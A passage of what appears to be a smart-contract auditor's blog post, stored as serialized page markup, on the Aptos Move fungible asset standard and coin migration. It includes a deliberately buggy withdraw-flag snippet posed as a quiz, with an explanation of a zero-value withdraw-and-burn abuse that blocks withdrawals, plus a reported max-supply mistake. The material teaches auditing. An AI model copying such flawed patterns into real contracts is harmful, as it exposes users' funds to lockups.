e":28,"tag":116,"props":65931,"children":65932},{"style":266},[65933],{"type":33,"value":6302},{"type":28,"tag":116,"props":65935,"children":65936},{"style":272},[65937],{"type":33,"value":61352},{"type":28,"tag":116,"props":65939,"children":65940},{"style":370},[65941],{"type":33,"value":4160},{"type":28,"tag":116,"props":65943,"children":65944},{"style":339},[65945],{"type":33,"value":61159},{"type":28,"tag":116,"props":65947,"children":65948},{"style":266},[65949],{"type":33,"value":825},{"type":28,"tag":116,"props":65951,"children":65952},{"style":272},[65953],{"type":33,"value":65598},{"type":28,"tag":116,"props":65955,"children":65956},{"style":370},[65957],{"type":33,"value":4160},{"type":28,"tag":116,"props":65959,"children":65960},{"style":370},[65961],{"type":33,"value":6813},{"type":28,"tag":116,"props":65963,"children":65964},{"style":339},[65965],{"type":33,"value":65044},{"type":28,"tag":116,"props":65967,"children":65968},{"style":266},[65969],{"type":33,"value":844},{"type":28,"tag":116,"props":65971,"children":65972},{"class":245,"line":256},[65973,65978,65982,65986],{"type":28,"tag":116,"props":65974,"children":65975},{"style":282},[65976],{"type":33,"value":65977},"    assert_withdraw_flag",{"type":28,"tag":116,"props":65979,"children":65980},{"style":266},[65981],{"type":33,"value":313},{"type":28,"tag":116,"props":65983,"children":65984},{"style":376},[65985],{"type":33,"value":3664},{"type":28,"tag":116,"props":65987,"children":65988},{"style":266},[65989],{"type":33,"value":895},{"type":28,"tag":116,"props":65991,"children":65992},{"class":245,"line":293},[65993,65997,66001],{"type":28,"tag":116,"props":65994,"children":65995},{"style":266},[65996],{"type":33,"value":62337},{"type":28,"tag":116,"props":65998,"children":65999},{"style":370},[66000],{"type":33,"value":9259},{"type":28,"tag":116,"props":66002,"children":66003},{"style":266},[66004],{"type":33,"value":11440},{"type":28,"tag":116,"props":66006,"children":66007},{"class":245,"line":361},[66008,66013,66017,66021],{"type":28,"tag":116,"props":66009,"children":66010},{"style":282},[66011],{"type":33,"value":66012},"    set_withdraw_flag",{"type":28,"tag":116,"props":66014,"children":66015},{"style":266},[66016],{"type":33,"value":313},{"type":28,"tag":116,"props":66018,"children":66019},{"style":376},[66020],{"type":33,"value":7847},{"type":28,"tag":116,"props":66022,"children":66023},{"style":266},[66024],{"type":33,"value":895},{"type":28,"tag":116,"props":66026,"children":66027},{"class":245,"line":387},[66028,66032,66036,66040,66044,66048,66052,66056,66060,66064],{"type":28,"tag":116,"props":66029,"children":66030},{"style":266},[66031],{"type":33,"value":65580},{"type":28,"tag":116,"props":66033,"children":66034},{"style":370},[66035],{"type":33,"value":3151},{"type":28,"tag":116,"props":66037,"children":66038},{"style":282},[66039],{"type":33,"value":65768},{"type":28,"tag":116,"props":66041,"children":66042},{"style":266},[66043],{"type":33,"value":313},{"type":28,"tag":116,"props":66045,"children":66046},{"style":272},[66047],{"type":33,"value":65598},{"type":28,"tag":116,"props":66049,"children":66050},{"style":266},[66051],{"type":33,"value":825},{"type":28,"tag":116,"props":66053,"children":66054},{"style":272},[66055],{"type":33,"value":5612},{"type":28,"tag":116,"props":66057,"children":66058},{"style":266},[66059],{"type":33,"value":825},{"type":28,"tag":116,"props":66061,"children":66062},{"style":272},[66063],{"type":33,"value":19970},{"type":28,"tag":116,"props":66065,"children":66066},{"style":266},[66067],{"type":33,"value":895},{"type":28,"tag":116,"props":66069,"children":66070},{"class":245,"line":400},[66071,66075,66079],{"type":28,"tag":116,"props":66072,"children":66073},{"style":266},[66074],{"type":33,"value":62337},{"type":28,"tag":116,"props":66076,"children":66077},{"style":370},[66078],{"type":33,"value":9259},{"type":28,"tag":116,"props":66080,"children":66081},{"style":266},[66082],{"type":33,"value":11440},{"type":28,"tag":116,"props":66084,"children":66085},{"class":245,"line":614},[66086],{"type":28,"tag":116,"props":66087,"children":66088},{"style":266},[66089],{"type":33,"value":3025},{"type":28,"tag":116,"props":66091,"children":66092},{"class":245,"line":631},[66093],{"type":28,"tag":116,"props":66094,"children":66095},{"emptyLinePlaceholder":19},[66096],{"type":33,"value":1044},{"type":28,"tag":116,"props":66098,"children":66099},{"class":245,"line":665},[66100,66104,66108,66112,66116,66120,66124,66128,66132,66136,66140,66144,66148,66152,66156,66160,66164,66168,66172,66176,66180,66184,66188,66192,66196,66200,66204,66208,66212],{"type":28,"tag":116,"props":66101,"children":66102},{"style":272},[66103],{"type":33,"value":61294},{"type":28,"tag":116,"props":66105,"children":66106},{"style":272},[66107],{"type":33,"value":5878},{"type":28,"tag":116,"props":66109,"children":66110},{"style":272},[66111],{"type":33,"value":19935},{"type":28,"tag":116,"props":66113,"children":66114},{"style":266},[66115],{"type":33,"value":514},{"type":28,"tag":116,"props":66117,"children":66118},{"style":339},[66119],{"type":33,"value":5659},{"type":28,"tag":116,"props":66121,"children":66122},{"style":370},[66123],{"type":33,"value":4160},{"type":28,"tag":116,"props":66125,"children":66126},{"style":272},[66127],{"type":33,"value":5603},{"type":28,"tag":116,"props":66129,"children":66130},{"style":266},[66131],{"type":33,"value":7282},{"type":28,"tag":116,"props":66133,"children":66134},{"style":272},[66135],{"type":33,"value":5612},{"type":28,"tag":116,"props":66137,"children":66138},{"style":370},[66139],{"type":33,"value":4160},{"type":28,"tag":116,"props":66141,"children":66142},{"style":339},[66143],{"type":33,"value":61180},{"type":28,"tag":116,"props":66145,"children":66146},{"style":266},[66147],{"type":33,"value":514},{"type":28,"tag":116,"props":66149,"children":66150},{"style":339},[66151],{"type":33,"value":5659},{"type":28,"tag":116,"props":66153,"children":66154},{"style":266},[66155],{"type":33,"value":6302},{"type":28,"tag":116,"props":66157,"children":66158},{"style":272},[66159],{"type":33,"value":19970},{"type":28,"tag":116,"props":66161,"children":66162},{"style":370},[66163],{"type":33,"value":4160},{"type":28,"tag":116,"props":66165,"children":66166},{"style":339},[66167],{"type":33,"value":5531},{"type":28,"tag":116,"props":66169,"children":66170},{"style":266},[66171],{"type":33,"value":825},{"type":28,"tag":116,"props":66173,"children":66174},{"style":272},[66175],{"type":33,"value":65598},{"type":28,"tag":116,"props":66177,"children":66178},{"style":370},[66179],{"type":33,"value":4160},{"type":28,"tag":116,"props":66181,"children":66182},{"style":370},[66183],{"type":33,"value":6813},{"type":28,"tag":116,"props":66185,"children":66186},{"style":339},[66187],{"type":33,"value":65044},{"type":28,"tag":116,"props":66189,"children":66190},{"style":266},[66191],{"type":33,"value":1829},{"type":28,"tag":116,"props":66193,"children":66194},{"style":370},[66195],{"type":33,"value":4160},{"type":28,"tag":116,"props":66197,"children":66198},{"style":339},[66199],{"type":33,"value":61159},{"type":28,"tag":116,"props":66201,"children":66202},{"style":272},[66203],{"type":33,"value":7238},{"type":28,"tag":116,"props":66205,"children":66206},{"style":266},[66207],{"type":33,"value":22695},{"type":28,"tag":116,"props":66209,"children":66210},{"style":370},[66211],{"type":33,"value":9259},{"type":28,"tag":116,"props":66213,"children":66214},{"style":266},[66215],{"type":33,"value":61385},{"type":28,"tag":116,"props":66217,"children":66218},{"class":245,"line":713},[66219,66223,66227,66231],{"type":28,"tag":116,"props":66220,"children":66221},{"style":282},[66222],{"type":33,"value":65977},{"type":28,"tag":116,"props":66224,"children":66225},{"style":266},[66226],{"type":33,"value":313},{"type":28,"tag":116,"props":66228,"children":66229},{"style":376},[66230],{"type":33,"value":7847},{"type":28,"tag":116,"props":66232,"children":66233},{"style":266},[66234],{"type":33,"value":895},{"type":28,"tag":116,"props":66236,"children":66237},{"class":245,"line":750},[66238,66242,66246],{"type":28,"tag":116,"props":66239,"children":66240},{"style":266},[66241],{"type":33,"value":62337},{"type":28,"tag":116,"props":66243,"children":66244},{"style":370},[66245],{"type":33,"value":9259},{"type":28,"tag":116,"props":66247,"children":66248},{"style":266},[66249],{"type":33,"value":11440},{"type":28,"tag":116,"props":66251,"children":66252},{"class":245,"line":779},[66253,66257,66261,66265],{"type":28,"tag":116,"props":66254,"children":66255},{"style":282},[66256],{"type":33,"value":66012},{"type":28,"tag":116,"props":66258,"children":66259},{"style":266},[66260],{"type":33,"value":313},{"type":28,"tag":116,"props":66262,"children":66263},{"style":376},[66264],{"type":33,"value":3664},{"type":28,"tag":116,"props":66266,"children":66267},{"style":266},[66268],{"type":33,"value":895},{"type":28,"tag":116,"props":66270,"children":66271},{"class":245,"line":796},[66272,66276,66280,66284,66288,66292,66296,66300,66304,66308],{"type":28,"tag":116,"props":66273,"children":66274},{"style":266},[66275],{"type":33,"value":65580},{"type":28,"tag":116,"props":66277,"children":66278},{"style":370},[66279],{"type":33,"value":3151},{"type":28,"tag":116,"props":66281,"children":66282},{"style":282},[66283],{"type":33,"value":65589},{"type":28,"tag":116,"props":66285,"children":66286},{"style":266},[66287],{"type":33,"value":313},{"type":28,"tag":116,"props":66289,"children":66290},{"style":272},[66291],{"type":33,"value":65598},{"type":28,"tag":116,"props":66293,"children":66294},{"style":266},[66295],{"type":33,"value":825},{"type":28,"tag":116,"props":66297,"children":66298},{"style":272},[66299],{"type":33,"value":5612},{"type":28,"tag":116,"props":66301,"children":66302},{"style":266},[66303],{"type":33,"value":825},{"type":28,"tag":116,"props":66305,"children":66306},{"style":272},[66307],{"type":33,"value":19970},{"type":28,"tag":116,"props":66309,"children":66310},{"style":266},[66311],{"type":33,"value":2830},{"type":28,"tag":116,"props":66313,"children":66314},{"class":245,"line":847},[66315],{"type":28,"tag":116,"props":66316,"children":66317},{"style":266},[66318],{"type":33,"value":406},{"type":28,"tag":29,"props":66320,"children":66321},{},[66322],{"type":33,"value":66323},"At first glance, this code appears valid, but not to an astute reader.",{"type":28,"tag":65805,"props":66325,"children":66326},{},[66327,66332],{"type":28,"tag":29,"props":66328,"children":66329},{},[66330],{"type":33,"value":66331},"Can you spot the bug? Hint: We mentioned the root cause previously.",{"type":28,"tag":65836,"props":66333,"children":66334},{"v-slot:answer-0":7},[66335,66355],{"type":28,"tag":29,"props":66336,"children":66337},{},[66338,66340,66345,66347,66353],{"type":33,"value":66339},"The developer overlooked an important detail, which we already mentioned earlier: a fungible asset with a value of zero can also be burned! An attacker could exploit this by withdrawing 0 ",{"type":28,"tag":98,"props":66341,"children":66343},{"className":66342},[],[66344],{"type":33,"value":61130},{"type":33,"value":66346}," (since withdraw doesn’t verify if the value is greater than 0) and then burning it using ",{"type":28,"tag":98,"props":66348,"children":66350},{"className":66349},[],[66351],{"type":33,"value":66352},"fungible_asset::destroy_zero",{"type":33,"value":66354},". This would complete the transaction while keeping the \"blocked\" flag set, effectively preventing further withdrawals.",{"type":28,"tag":29,"props":66356,"children":66357},{},[66358],{"type":33,"value":66359},"It's important to understand all the features in the standard.",{"type":28,"tag":63,"props":66361,"children":66363},{"id":66362},"migrating-from-coins-to-fungible-assets",[66364],{"type":33,"value":66365},"Migrating from coins to fungible assets",{"type":28,"tag":29,"props":66367,"children":66368},{},[66369,66371,66376],{"type":33,"value":66370},"If a fungible asset is considered an upgrade to ",{"type":28,"tag":98,"props":66372,"children":66374},{"className":66373},[],[66375],{"type":33,"value":60585},{"type":33,"value":66377},", a transition mechanism becomes necessary. This is addressed through a conversion map, establishing a relationship between specific coin and fungible asset. This duality is not without its challenges.",{"type":28,"tag":66379,"props":66380,"children":66381},"note",{},[66382],{"type":28,"tag":29,"props":66383,"children":66384},{},[66385,66387,66392,66394,66399],{"type":33,"value":66386},"While the ",{"type":28,"tag":98,"props":66388,"children":66390},{"className":66389},[],[66391],{"type":33,"value":60585},{"type":33,"value":66393}," API recognizes and integrates with fungible assets, the fungible asset APIs do not have awareness of the linked ",{"type":28,"tag":98,"props":66395,"children":66397},{"className":66396},[],[66398],{"type":33,"value":60585},{"type":33,"value":141},{"type":28,"tag":29,"props":66401,"children":66402},{},[66403,66404,66410,66412,66417,66419,66424],{"type":33,"value":16275},{"type":28,"tag":98,"props":66405,"children":66407},{"className":66406},[],[66408],{"type":33,"value":66409},"coin_to_fungible_asset",{"type":33,"value":66411}," converting function automatically generates a corresponding fungible asset for a ",{"type":28,"tag":98,"props":66413,"children":66415},{"className":66414},[],[66416],{"type":33,"value":60585},{"type":33,"value":66418}," if one does not already exist. Manual creation of a fungible asset and its linkage to a ",{"type":28,"tag":98,"props":66420,"children":66422},{"className":66421},[],[66423],{"type":33,"value":60585},{"type":33,"value":66425}," is not allowed.",{"type":28,"tag":234,"props":66427,"children":66429},{"className":2652,"code":66428,"language":2651,"meta":7,"style":7},"public fun coin_to_fungible_asset\u003CCoinType>(\n    coin: Coin\u003CCoinType>\n): FungibleAsset acquires CoinConversionMap, CoinInfo {\n    let metadata = ensure_paired_metadata\u003CCoinType>();\n    let amount = burn_internal(coin);\n    fungible_asset::mint_internal(metadata, amount)\n}\n",[66430],{"type":28,"tag":98,"props":66431,"children":66432},{"__ignoreMap":7},[66433,66461,66488,66524,66557,66590,66626],{"type":28,"tag":116,"props":66434,"children":66435},{"class":245,"line":246},[66436,66440,66444,66449,66453,66457],{"type":28,"tag":116,"props":66437,"children":66438},{"style":272},[66439],{"type":33,"value":61294},{"type":28,"tag":116,"props":66441,"children":66442},{"style":272},[66443],{"type":33,"value":5878},{"type":28,"tag":116,"props":66445,"children":66446},{"style":272},[66447],{"type":33,"value":66448}," coin_to_fungible_asset",{"type":28,"tag":116,"props":66450,"children":66451},{"style":266},[66452],{"type":33,"value":514},{"type":28,"tag":116,"props":66454,"children":66455},{"style":339},[66456],{"type":33,"value":6255},{"type":28,"tag":116,"props":66458,"children":66459},{"style":266},[66460],{"type":33,"value":6260},{"type":28,"tag":116,"props":66462,"children":66463},{"class":245,"line":256},[66464,66468,66472,66476,66480,66484],{"type":28,"tag":116,"props":66465,"children":66466},{"style":272},[66467],{"type":33,"value":60804},{"type":28,"tag":116,"props":66469,"children":66470},{"style":370},[66471],{"type":33,"value":4160},{"type":28,"tag":116,"props":66473,"children":66474},{"style":339},[66475],{"type":33,"value":5473},{"type":28,"tag":116,"props":66477,"children":66478},{"style":266},[66479],{"type":33,"value":514},{"type":28,"tag":116,"props":66481,"children":66482},{"style":339},[66483],{"type":33,"value":6255},{"type":28,"tag":116,"props":66485,"children":66486},{"style":266},[66487],{"type":33,"value":506},{"type":28,"tag":116,"props":66489,"children":66490},{"class":245,"line":293},[66491,66495,66499,66503,66507,66512,66516,66520],{"type":28,"tag":116,"props":66492,"children":66493},{"style":266},[66494],{"type":33,"value":1829},{"type":28,"tag":116,"props":66496,"children":66497},{"style":370},[66498],{"type":33,"value":4160},{"type":28,"tag":116,"props":66500,"children":66501},{"style":339},[66502],{"type":33,"value":61159},{"type":28,"tag":116,"props":66504,"children":66505},{"style":272},[66506],{"type":33,"value":7238},{"type":28,"tag":116,"props":66508,"children":66509},{"style":339},[66510],{"type":33,"value":66511}," CoinConversionMap",{"type":28,"tag":116,"props":66513,"children":66514},{"style":266},[66515],{"type":33,"value":825},{"type":28,"tag":116,"props":66517,"children":66518},{"style":339},[66519],{"type":33,"value":6385},{"type":28,"tag":116,"props":66521,"children":66522},{"style":266},[66523],{"type":33,"value":1291},{"type":28,"tag":116,"props":66525,"children":66526},{"class":245,"line":361},[66527,66531,66536,66540,66545,66549,66553],{"type":28,"tag":116,"props":66528,"children":66529},{"style":376},[66530],{"type":33,"value":2672},{"type":28,"tag":116,"props":66532,"children":66533},{"style":272},[66534],{"type":33,"value":66535}," metadata",{"type":28,"tag":116,"props":66537,"children":66538},{"style":370},[66539],{"type":33,"value":2226},{"type":28,"tag":116,"props":66541,"children":66542},{"style":272},[66543],{"type":33,"value":66544}," ensure_paired_metadata",{"type":28,"tag":116,"props":66546,"children":66547},{"style":266},[66548],{"type":33,"value":514},{"type":28,"tag":116,"props":66550,"children":66551},{"style":339},[66552],{"type":33,"value":6255},{"type":28,"tag":116,"props":66554,"children":66555},{"style":266},[66556],{"type":33,"value":8124},{"type":28,"tag":116,"props":66558,"children":66559},{"class":245,"line":387},[66560,66564,66569,66573,66578,66582,66586],{"type":28,"tag":116,"props":66561,"children":66562},{"style":376},[66563],{"type":33,"value":2672},{"type":28,"tag":116,"props":66565,"children":66566},{"style":272},[66567],{"type":33,"value":66568}," amount",{"type":28,"tag":116,"props":66570,"children":66571},{"style":370},[66572],{"type":33,"value":2226},{"type":28,"tag":116,"props":66574,"children":66575},{"style":282},[66576],{"type":33,"value":66577}," burn_internal",{"type":28,"tag":116,"props":66579,"children":66580},{"style":266},[66581],{"type":33,"value":313},{"type":28,"tag":116,"props":66583,"children":66584},{"style":272},[66585],{"type":33,"value":60552},{"type":28,"tag":116,"props":66587,"children":66588},{"style":266},[66589],{"type":33,"value":895},{"type":28,"tag":116,"props":66591,"children":66592},{"class":245,"line":400},[66593,66597,66601,66606,66610,66614,66618,66622],{"type":28,"tag":116,"props":66594,"children":66595},{"style":266},[66596],{"type":33,"value":65580},{"type":28,"tag":116,"props":66598,"children":66599},{"style":370},[66600],{"type":33,"value":3151},{"type":28,"tag":116,"props":66602,"children":66603},{"style":282},[66604],{"type":33,"value":66605},"mint_internal",{"type":28,"tag":116,"props":66607,"children":66608},{"style":266},[66609],{"type":33,"value":313},{"type":28,"tag":116,"props":66611,"children":66612},{"style":272},[66613],{"type":33,"value":61931},{"type":28,"tag":116,"props":66615,"children":66616},{"style":266},[66617],{"type":33,"value":825},{"type":28,"tag":116,"props":66619,"children":66620},{"style":272},[66621],{"type":33,"value":19970},{"type":28,"tag":116,"props":66623,"children":66624},{"style":266},[66625],{"type":33,"value":2830},{"type":28,"tag":116,"props":66627,"children":66628},{"class":245,"line":614},[66629],{"type":28,"tag":116,"props":66630,"children":66631},{"style":266},[66632],{"type":33,"value":406},{"type":28,"tag":29,"props":66634,"children":66635},{},[66636,66638,66645],{"type":33,"value":66637},"When creating a fungible asset, several pieces of information are required, such as the asset’s name, symbol, or maximum supply. During our audit of the fungible asset standard, we ",{"type":28,"tag":87,"props":66639,"children":66642},{"href":66640,"rel":66641},"https://github.com/aptos-labs/aptos-core/commit/e5f4b62b237dad4d15069d3bb0b551b2df04bf08",[91],[66643],{"type":33,"value":66644},"noticed an overlooked detail",{"type":33,"value":66646}," in the linking process.",{"type":28,"tag":234,"props":66648,"children":66650},{"className":2652,"code":66649,"language":2651,"meta":7,"style":7},"[...]\nprimary_fungible_store::create_primary_store_enabled_fungible_asset(\n    &metadata_object_cref,\n    option::map(coin_supply\u003CCoinType>(), |_| MAX_U128),\n    name\u003CCoinType>(),\n    symbol\u003CCoinType>(),\n    decimals\u003CCoinType>(),\n    string::utf8(b\"\"),\n    string::utf8(b\"\"),\n);\n[...]\n",[66651],{"type":28,"tag":98,"props":66652,"children":66653},{"__ignoreMap":7},[66654,66669,66689,66706,66762,66783,66803,66823,66853,66880,66887],{"type":28,"tag":116,"props":66655,"children":66656},{"class":245,"line":246},[66657,66661,66665],{"type":28,"tag":116,"props":66658,"children":66659},{"style":266},[66660],{"type":33,"value":347},{"type":28,"tag":116,"props":66662,"children":66663},{"style":370},[66664],{"type":33,"value":9259},{"type":28,"tag":116,"props":66666,"children":66667},{"style":266},[66668],{"type":33,"value":11440},{"type":28,"tag":116,"props":66670,"children":66671},{"class":245,"line":256},[66672,66676,66680,66685],{"type":28,"tag":116,"props":66673,"children":66674},{"style":266},[66675],{"type":33,"value":62228},{"type":28,"tag":116,"props":66677,"children":66678},{"style":370},[66679],{"type":33,"value":3151},{"type":28,"tag":116,"props":66681,"children":66682},{"style":282},[66683],{"type":33,"value":66684},"create_primary_store_enabled_fungible_asset",{"type":28,"tag":116,"props":66686,"children":66687},{"style":266},[66688],{"type":33,"value":3133},{"type":28,"tag":116,"props":66690,"children":66691},{"class":245,"line":293},[66692,66697,66702],{"type":28,"tag":116,"props":66693,"children":66694},{"style":370},[66695],{"type":33,"value":66696},"    &",{"type":28,"tag":116,"props":66698,"children":66699},{"style":272},[66700],{"type":33,"value":66701},"metadata_object_cref",{"type":28,"tag":116,"props":66703,"children":66704},{"style":266},[66705],{"type":33,"value":3178},{"type":28,"tag":116,"props":66707,"children":66708},{"class":245,"line":361},[66709,66714,66718,66723,66727,66732,66736,66740,66745,66749,66753,66757],{"type":28,"tag":116,"props":66710,"children":66711},{"style":266},[66712],{"type":33,"value":66713},"    option",{"type":28,"tag":116,"props":66715,"children":66716},{"style":370},[66717],{"type":33,"value":3151},{"type":28,"tag":116,"props":66719,"children":66720},{"style":282},[66721],{"type":33,"value":66722},"map",{"type":28,"tag":116,"props":66724,"children":66725},{"style":266},[66726],{"type":33,"value":313},{"type":28,"tag":116,"props":66728,"children":66729},{"style":272},[66730],{"type":33,"value":66731},"coin_supply",{"type":28,"tag":116,"props":66733,"children":66734},{"style":266},[66735],{"type":33,"value":514},{"type":28,"tag":116,"props":66737,"children":66738},{"style":339},[66739],{"type":33,"value":6255},{"type":28,"tag":116,"props":66741,"children":66742},{"style":266},[66743],{"type":33,"value":66744},">(), ",{"type":28,"tag":116,"props":66746,"children":66747},{"style":370},[66748],{"type":33,"value":10083},{"type":28,"tag":116,"props":66750,"children":66751},{"style":272},[66752],{"type":33,"value":2754},{"type":28,"tag":116,"props":66754,"children":66755},{"style":370},[66756],{"type":33,"value":10083},{"type":28,"tag":116,"props":66758,"children":66759},{"style":266},[66760],{"type":33,"value":66761}," MAX_U128),\n",{"type":28,"tag":116,"props":66763,"children":66764},{"class":245,"line":387},[66765,66770,66774,66778],{"type":28,"tag":116,"props":66766,"children":66767},{"style":272},[66768],{"type":33,"value":66769},"    name",{"type":28,"tag":116,"props":66771,"children":66772},{"style":266},[66773],{"type":33,"value":514},{"type":28,"tag":116,"props":66775,"children":66776},{"style":339},[66777],{"type":33,"value":6255},{"type":28,"tag":116,"props":66779,"children":66780},{"style":266},[66781],{"type":33,"value":66782},">(),\n",{"type":28,"tag":116,"props":66784,"children":66785},{"class":245,"line":400},[66786,66791,66795,66799],{"type":28,"tag":116,"props":66787,"children":66788},{"style":272},[66789],{"type":33,"value":66790},"    symbol",{"type":28,"tag":116,"props":66792,"children":66793},{"style":266},[66794],{"type":33,"value":514},{"type":28,"tag":116,"props":66796,"children":66797},{"style":339},[66798],{"type":33,"value":6255},{"type":28,"tag":116,"props":66800,"children":66801},{"style":266},[66802],{"type":33,"value":66782},{"type":28,"tag":116,"props":66804,"children":66805},{"class":245,"line":614},[66806,66811,66815,66819],{"type":28,"tag":116,"props":66807,"children":66808},{"style":272},[66809],{"type":33,"value":66810},"    decimals",{"type":28,"tag":116,"props":66812,"children":66813},{"style":266},[66814],{"type":33,"value":514},{"type":28,"tag":116,"props":66816,"children":66817},{"style":339},[66818],{"type":33,"value":6255},{"type":28,"tag":116,"props":66820,"children":66821},{"style":266},[66822],{"type":33,"value":66782},{"type":28,"tag":116,"props":66824,"children":66825},{"class":245,"line":631},[66826,66831,66835,66840,66844,66849],{"type":28,"tag":116,"props":66827,"children":66828},{"style":266},[66829],{"type":33,"value":66830},"    string",{"type":28,"tag":116,"props":66832,"children":66833},{"style":370},[66834],{"type":33,"value":3151},{"type":28,"tag":116,"props":66836,"children":66837},{"style":282},[66838],{"type":33,"value":66839},"utf8",{"type":28,"tag":116,"props":66841,"children":66842},{"style":266},[66843],{"type":33,"value":313},{"type":28,"tag":116,"props":66845,"children":66846},{"style":563},[66847],{"type":33,"value":66848},"b\"\"",{"type":28,"tag":116,"props":66850,"children":66851},{"style":266},[66852],{"type":33,"value":6408},{"type":28,"tag":116,"props":66854,"children":66855},{"class":245,"line":665},[66856,66860,66864,66868,66872,66876],{"type":28,"tag":116,"props":66857,"children":66858},{"style":266},[66859],{"type":33,"value":66830},{"type":28,"tag":116,"props":66861,"children":66862},{"style":370},[66863],{"type":33,"value":3151},{"type":28,"tag":116,"props":66865,"children":66866},{"style":282},[66867],{"type":33,"value":66839},{"type":28,"tag":116,"props":66869,"children":66870},{"style":266},[66871],{"type":33,"value":313},{"type":28,"tag":116,"props":66873,"children":66874},{"style":563},[66875],{"type":33,"value":66848},{"type":28,"tag":116,"props":66877,"children":66878},{"style":266},[66879],{"type":33,"value":6408},{"type":28,"tag":116,"props":66881,"children":66882},{"class":245,"line":713},[66883],{"type":28,"tag":116,"props":66884,"children":66885},{"style":266},[66886],{"type":33,"value":895},{"type":28,"tag":116,"props":66888,"children":66889},{"class":245,"line":750},[66890,66894,66898],{"type":28,"tag":116,"props":66891,"children":66892},{"style":266},[66893],{"type":33,"value":347},{"type":28,"tag":116,"props":66895,"children":66896},{"style":370},[66897],{"type":33,"value":9259},{"type":28,"tag":116,"props":66899,"children":66900},{"style":266},[66901],{"type":33,"value":11440},{"type":28,"tag":29,"props":66903,"children":66904},{},[66905,66907,66912],{"type":33,"value":66906},"When the linked fungible asset was created, the current ",{"type":28,"tag":98,"props":66908,"children":66910},{"className":66909},[],[66911],{"type":33,"value":60585},{"type":33,"value":66913}," supply was incorrectly passed as the maximum fungible asset supply, preventing the minting of additional fungible assets beyond the existing coin circulation.",{"type":28,"tag":29,"props":66915,"children":66916},{},[66917,66919,66924,66926,66932,66934,66939],{"type":33,"value":66918},"Users can manually migrate their ",{"type":28,"tag":98,"props":66920,"children":66922},{"className":66921},[],[66923],{"type":33,"value":60747},{"type":33,"value":66925}," to a primary fungible store. This creates a store for the paired fungible asset (if one doesn’t exist) and removes the ",{"type":28,"tag":98,"props":66927,"children":66929},{"className":66928},[],[66930],{"type":33,"value":66931},"\u003CCoinStore\u003CCoinType>>",{"type":33,"value":66933}," from the caller. All coins in the ",{"type":28,"tag":98,"props":66935,"children":66937},{"className":66936},[],[66938],{"type":33,"value":60747},{"type":33,"value":66940}," are exchanged and transferred to the new store during the migration.",{"type":28,"tag":234,"props":66942,"children":66944},{"className":2652,"code":66943,"language":2651,"meta":7,"style":7},"/// Voluntarily migrate to fungible store for `CoinType` if not yet.\npublic entry fun migrate_to_fungible_store\u003CCoinType>(\n    account: &signer\n) acquires CoinStore, CoinConversionMap, CoinInfo {\n    maybe_convert_to_fungible_store\u003CCoinType>(signer::address_of(account));\n}\n",[66945],{"type":28,"tag":98,"props":66946,"children":66947},{"__ignoreMap":7},[66948,66956,66988,67008,67044,67085],{"type":28,"tag":116,"props":66949,"children":66950},{"class":245,"line":246},[66951],{"type":28,"tag":116,"props":66952,"children":66953},{"style":250},[66954],{"type":33,"value":66955},"/// Voluntarily migrate to fungible store for `CoinType` if not yet.\n",{"type":28,"tag":116,"props":66957,"children":66958},{"class":245,"line":256},[66959,66963,66967,66971,66976,66980,66984],{"type":28,"tag":116,"props":66960,"children":66961},{"style":272},[66962],{"type":33,"value":61294},{"type":28,"tag":116,"props":66964,"children":66965},{"style":272},[66966],{"type":33,"value":62261},{"type":28,"tag":116,"props":66968,"children":66969},{"style":272},[66970],{"type":33,"value":5878},{"type":28,"tag":116,"props":66972,"children":66973},{"style":272},[66974],{"type":33,"value":66975}," migrate_to_fungible_store",{"type":28,"tag":116,"props":66977,"children":66978},{"style":266},[66979],{"type":33,"value":514},{"type":28,"tag":116,"props":66981,"children":66982},{"style":339},[66983],{"type":33,"value":6255},{"type":28,"tag":116,"props":66985,"children":66986},{"style":266},[66987],{"type":33,"value":6260},{"type":28,"tag":116,"props":66989,"children":66990},{"class":245,"line":293},[66991,66995,66999,67003],{"type":28,"tag":116,"props":66992,"children":66993},{"style":272},[66994],{"type":33,"value":24826},{"type":28,"tag":116,"props":66996,"children":66997},{"style":370},[66998],{"type":33,"value":4160},{"type":28,"tag":116,"props":67000,"children":67001},{"style":370},[67002],{"type":33,"value":6813},{"type":28,"tag":116,"props":67004,"children":67005},{"style":272},[67006],{"type":33,"value":67007},"signer\n",{"type":28,"tag":116,"props":67009,"children":67010},{"class":245,"line":361},[67011,67015,67019,67023,67027,67032,67036,67040],{"type":28,"tag":116,"props":67012,"children":67013},{"style":266},[67014],{"type":33,"value":1609},{"type":28,"tag":116,"props":67016,"children":67017},{"style":272},[67018],{"type":33,"value":6015},{"type":28,"tag":116,"props":67020,"children":67021},{"style":339},[67022],{"type":33,"value":60768},{"type":28,"tag":116,"props":67024,"children":67025},{"style":266},[67026],{"type":33,"value":825},{"type":28,"tag":116,"props":67028,"children":67029},{"style":339},[67030],{"type":33,"value":67031},"CoinConversionMap",{"type":28,"tag":116,"props":67033,"children":67034},{"style":266},[67035],{"type":33,"value":825},{"type":28,"tag":116,"props":67037,"children":67038},{"style":339},[67039],{"type":33,"value":6385},{"type":28,"tag":116,"props":67041,"children":67042},{"style":266},[67043],{"type":33,"value":1291},{"type":28,"tag":116,"props":67045,"children":67046},{"class":245,"line":387},[67047,67052,67056,67060,67065,67069,67073,67077,67081],{"type":28,"tag":116,"props":67048,"children":67049},{"style":272},[67050],{"type":33,"value":67051},"    maybe_convert_to_fungible_store",{"type":28,"tag":116,"props":67053,"children":67054},{"style":266},[67055],{"type":33,"value":514},{"type":28,"tag":116,"props":67057,"children":67058},{"style":339},[67059],{"type":33,"value":6255},{"type":28,"tag":116,"props":67061,"children":67062},{"style":266},[67063],{"type":33,"value":67064},">(signer",{"type":28,"tag":116,"props":67066,"children":67067},{"style":370},[67068],{"type":33,"value":3151},{"type":28,"tag":116,"props":67070,"children":67071},{"style":282},[67072],{"type":33,"value":6881},{"type":28,"tag":116,"props":67074,"children":67075},{"style":266},[67076],{"type":33,"value":313},{"type":28,"tag":116,"props":67078,"children":67079},{"style":272},[67080],{"type":33,"value":12619},{"type":28,"tag":116,"props":67082,"children":67083},{"style":266},[67084],{"type":33,"value":1929},{"type":28,"tag":116,"props":67086,"children":67087},{"class":245,"line":400},[67088],{"type":28,"tag":116,"props":67089,"children":67090},{"style":266},[67091],{"type":33,"value":406},{"type":28,"tag":29,"props":67093,"children":67094},{},[67095,67097,67102,67104,67109],{"type":33,"value":67096},"A curious reader might wonder about the fate of the ",{"type":28,"tag":98,"props":67098,"children":67100},{"className":67099},[],[67101],{"type":33,"value":60747},{"type":33,"value":67103}," \"frozen\" status during migration. Unsurprisingly tough, the \"frozen\" 